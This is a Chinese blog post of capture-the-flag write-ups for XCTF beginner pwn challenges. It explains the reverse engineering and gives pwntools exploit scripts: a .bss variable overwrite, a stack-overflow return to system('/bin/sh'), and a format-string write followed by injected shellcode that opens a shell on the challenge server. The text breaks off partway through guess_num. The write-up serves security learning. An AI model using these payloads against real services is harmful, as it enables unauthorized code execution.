<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/ac1.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"fallsilkworms.github.io","root":"/","images":"/images","scheme":"Muse","version":"8.2.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}};
  </script>
<meta name="description" content="攻防世界pwn新手区hello_pwn照例查  IDA  分析if语句知道当dword_60106C&#x3D;1853186401可以cat flag 可知unk…与dword…这俩变量都在.bss段，相隔4个字符，unk…是由我们输入的，可以利用其覆盖dword…的值就行,ROP直接打掉  exp: 12345678from pwn import *r&#x3D;remote(&amp;#x27;111.200.241.">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界新手Pwn">
<meta property="og:url" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/index.html">
<meta property="og:site_name" content="fallsilkworm&#39;s Blog">
<meta property="og:description" content="攻防世界pwn新手区hello_pwn照例查  IDA  分析if语句知道当dword_60106C&#x3D;1853186401可以cat flag 可知unk…与dword…这俩变量都在.bss段，相隔4个字符，unk…是由我们输入的，可以利用其覆盖dword…的值就行,ROP直接打掉  exp: 12345678from pwn import *r&#x3D;remote(&amp;#x27;111.200.241.">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210731224644451.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210731224814074.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210731224955916.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140340867.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140432092.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140447125.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140530666.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140542783.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140709214.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140720269.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802141016367.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213323993.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213432276.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213507980.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213600097.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213639203.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213916017.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802214052838.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802215639897.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802220029709.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802221002513.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802221746792.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803001619619.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803001804263.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803001950624.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803015022245.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803015410884.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803204915843.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803205002331.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803205112864.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803205315714.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803205340200.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803210809155.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212301602.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212329433.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212806191.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212825087.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212923418.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803212947420.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803213109114.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803215305368.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803233148272.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803233438018.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803235552887.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210804001143804.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210804000926106.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210804153644665.png">
<meta property="article:published_time" content="2021-11-05T07:30:59.000Z">
<meta property="article:modified_time" content="2021-11-05T07:31:24.052Z">
<meta property="article:author" content="YX">
<meta property="article:tag" content="Pwn刷题">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210731224644451.png">


<link rel="canonical" href="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>
<title>攻防世界新手Pwn | fallsilkworm's Blog</title>
  




  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">fallsilkworm's Blog</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">一只千年秋蚕</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cpwn%E6%96%B0%E6%89%8B%E5%8C%BA"><span class="nav-number">1.</span> <span class="nav-text">攻防世界pwn新手区</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#hello-pwn"><span class="nav-number">1.1.</span> <span class="nav-text">hello_pwn</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level2"><span class="nav-number">1.2.</span> <span class="nav-text">level2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#string"><span class="nav-number">1.3.</span> <span class="nav-text">string</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#guess-num"><span class="nav-number">1.4.</span> <span class="nav-text">guess_num</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#int-overflow"><span class="nav-number">1.5.</span> <span class="nav-text">int_overflow</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cgpwn2"><span class="nav-number">1.6.</span> <span class="nav-text">cgpwn2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level3"><span class="nav-number">1.7.</span> <span class="nav-text">level3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CGfsb"><span class="nav-number">1.8.</span> <span class="nav-text">CGfsb</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="YX"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">YX</p>
  <div class="site-description" itemprop="description">等一场秋风再起，花开如绎</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://fallsilkworms.github.io/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="YX">
      <meta itemprop="description" content="等一场秋风再起，花开如绎">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="fallsilkworm's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          攻防世界新手Pwn
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2021-11-05 15:30:59 / 修改时间：15:31:24" itemprop="dateCreated datePublished" datetime="2021-11-05T15:30:59+08:00">2021-11-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Bin/" itemprop="url" rel="index"><span itemprop="name">Bin</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="攻防世界pwn新手区"><a href="#攻防世界pwn新手区" class="headerlink" title="攻防世界pwn新手区"></a>攻防世界pwn新手区</h2><h3 id="hello-pwn"><a href="#hello-pwn" class="headerlink" title="hello_pwn"></a>hello_pwn</h3><p>照例查</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210731224644451.png" alt="image-20210731224644451"></p>
<p>IDA</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210731224814074.png" alt="image-20210731224814074"></p>
<p>分析if语句知道当dword_60106C=1853186401可以cat flag</p>
<p>可知unk…与dword…这俩变量都在.bss段，相隔4个字符，unk…是由我们输入的，可以利用其覆盖dword…的值就行,ROP直接打掉</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210731224955916.png" alt="image-20210731224955916"></p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;111.200.241.244&#x27;</span>,<span class="number">53218</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">4</span>+p64(<span class="number">1853186401</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;lets get helloworld for bof\n&quot;</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line"><span class="built_in">print</span> r.recv()</span><br></pre></td></tr></table></figure>
<h3 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h3><p>常规</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140340867.png" alt="image-20210802140340867"></p>
<p>IDA</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140432092.png" alt="image-20210802140432092"></p>
<p>跟进</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140447125.png" alt="image-20210802140447125"></p>
<p>读0x100，明显栈溢出，如出一辙跟进buf</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140530666.png" alt="image-20210802140530666"></p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140542783.png" alt="image-20210802140542783"></p>
<p>所以buf距离ret的长度为0x88+0x04</p>
<p>发现system和/bin/sh，记录地址</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140709214.png" alt="image-20210802140709214"></p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802140720269.png" alt="image-20210802140720269"></p>
<p>将返回地址跳转至system函数再压入参数/bin/sh可以获得控制权</p>
<p>但是自己写exp的时候错了，查看wp发现漏了个p32(0)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;111.200.241.244&#x27;</span>,<span class="number">65098</span>)</span><br><span class="line">sys=<span class="number">0x08048320</span></span><br><span class="line">sh=<span class="number">0x0804A024</span></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x88</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">4</span>+p32(sys)+p32(<span class="number">0</span>)+p32(sh)</span><br><span class="line">r.send(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802141016367.png" alt="image-20210802141016367"></p>
<h3 id="string"><a href="#string" class="headerlink" title="string"></a>string</h3><p>照例分析</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213323993.png" alt="image-20210802213323993"></p>
<p>往下运行</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213432276.png" alt="image-20210802213432276"></p>
<p>是一个很长的文字游戏，输到最后直接就结束了，拖IDA</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213507980.png" alt="image-20210802213507980"></p>
<p>大致分析得出v4是关键变量，跟进其函数</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213600097.png" alt="image-20210802213600097"></p>
<p>这就是那个界面了，三个函数分别点进去</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213639203.png" alt="image-20210802213639203"></p>
<p>第一个没什么用应该</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802213916017.png" alt="image-20210802213916017"></p>
<p>第二个，看见printf，是有一个格式化字符串漏洞</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802214052838.png" alt="image-20210802214052838"></p>
<p>第三个，if语句分析知道是要令a1=a1[1]（a1是啥不知道）</p>
<p>最后得知，a1就是v4，可以利用函数指针来调用系统函数system(“/bin/sh”)来获取控制权限，但是system(“/bin/sh”)并不能被函数指针所理解，这里应该转化成机器码,用<strong>asm(shellcraft.sh())</strong></p>
<p>回溯到main</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802215639897.png" alt="image-20210802215639897"></p>
<p>只需要将v3[0] = 85或者v3[1] = 68，就是通过格式化字符串漏洞使数组的前两个数相等就可以调用函数了。这里选择是前者</p>
<p>需要注意的是：</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802220029709.png" alt="image-20210802220029709"></p>
<p>这个是64位，前六个参数放寄存器，第七个参数开始放在栈中所以偏移量是7</p>
<p>exp就有了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch = <span class="string">&#x27;amd64&#x27;</span>, os = <span class="string">&#x27;linux&#x27;</span>)<span class="comment">#这个不能少</span></span><br><span class="line">r = remote(<span class="string">&quot;111.200.241.244&quot;</span>, <span class="number">51763</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;secret[0] is &quot;</span>)</span><br><span class="line">addr = <span class="built_in">int</span>(r.recvuntil(<span class="string">&quot;\n&quot;</span>)[:-<span class="number">1</span>], <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">&quot;What should your character&#x27;s name be:\n&quot;</span>, <span class="string">&quot;aaa&quot;</span>)</span><br><span class="line">r.sendlineafter(<span class="string">&quot;So, where you will go?east or up?:\n&quot;</span>, <span class="string">&quot;east&quot;</span>)</span><br><span class="line">r.sendlineafter(<span class="string">&quot;go into there(1), or leave(0)?:\n&quot;</span>, <span class="string">&quot;1&quot;</span>)</span><br><span class="line">r.sendlineafter(<span class="string">&quot;&#x27;Give me an address&#x27;&quot;</span>, <span class="built_in">str</span>(addr))</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&quot;And, you wish is:\n&quot;</span>)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span> * <span class="number">85</span> + <span class="string">&quot;%7$n&quot;</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">r.sendline(shellcode)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802221002513.png" alt="image-20210802221002513"></p>
<h3 id="guess-num"><a href="#guess-num" class="headerlink" title="guess_num"></a>guess_num</h3><p>知识补充：<a target="_blank" rel="noopener" href="https://www.runoob.com/w3cnote/cpp-rand-srand.html">C++ rand 与 srand 的用法 </a></p>
<p>照例</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210802221746792.png" alt="image-20210802221746792"></p>
<p>运行</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803001619619.png" alt="image-20210803001619619"></p>
<p>拖IDA</p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803001804263.png" alt="image-20210803001804263"></p>
<p><img src="/2021/11/05/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8BPwn/image-20210803001950624.png" alt="image-20210803001950624"></p>
<p>循环，根据随机数计算的法则输入十个数，不相同就GG，相同就cat flag</p>
